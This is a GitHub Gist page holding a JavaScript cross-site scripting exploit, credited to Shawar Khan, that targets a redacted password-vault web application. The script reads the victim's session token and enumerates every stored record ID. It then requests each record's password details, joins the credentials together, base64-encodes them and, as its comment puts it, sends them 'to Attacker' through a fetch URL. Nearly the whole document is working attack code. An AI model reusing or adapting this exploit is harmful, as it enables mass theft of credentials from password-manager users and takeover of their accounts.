Forked from shawarkhanethicalhacker/password_vault_exploit.js
Created
October 1, 2020 14:18
-
-
Save samsayen/eef4174a6045ee63b31db05d8b2e3677 to your computer and use it in GitHub Desktop.
XSS Exploit code for retrieving passwords stored in a Password Vault
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
//Exploit Code by Shawar Khan | |
var data_chunks = ''; | |
// Capturing Records from API | |
fetch('https://redacted.com/api/v3/records/all').then((resp) => resp.text()).then(function(data) { | |
// Holds the records in as String | |
var allrecords = data; | |
// converting response to JSON | |
json_allrecords = JSON.parse(allrecords)['records']; | |
// holds record Ids | |
var record_ids = new Array(); | |
Object.entries(json_allrecords).forEach(function(obj) { | |
record_ids.push((obj['1']['0']['id'])); | |
}); | |
// Capturing Session Token / Used to send POST requests | |
fetch('https://redacted.com/api/v1/session/token').then((resp) => resp.text()).then(function(data1) { | |
// Holds Session Token | |
var session_token = JSON.parse(data1)['session_token']; | |
data_chunks = ""; // Will hold a complete record | |
//Put loop for itterating through IDS | |
record_ids.forEach(function(record_id) { | |
// Looping through IDs and grabing Passwords | |
var grab_password = new XMLHttpRequest(); | |
grab_password.open('POST', 'https://redacted.com/api/v1/passwords/record', true); | |
grab_password.setRequestHeader("Content-Type", "application/json;charset=UTF-8"); | |
grab_password.setRequestHeader("token", session_token); | |
grab_password.onload = function () { | |
response_password = this.responseText; | |
parsed_passwords = JSON.parse(response_password); | |
// Sending data chunks | |
data_chunks += parsed_passwords['record']['description'] | |
data_chunks += "\n"+parsed_passwords['record']['details']['0']['value'] | |
data_chunks += "\n"+parsed_passwords['record']['details']['1']['value'] | |
data_chunks += "\n"+parsed_passwords['record']['details']['2']['value']+"\n\n" | |
}; | |
grab_password.send(JSON.stringify({id:record_id,is_organization:false})); | |
}); | |
setTimeout(function(){ // Submitting Data Chunks to Attacker | |
fetch('http://127.0.0.1/?data='+btoa(data_chunks)) | |
}, 2000); | |
}); | |
}); |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment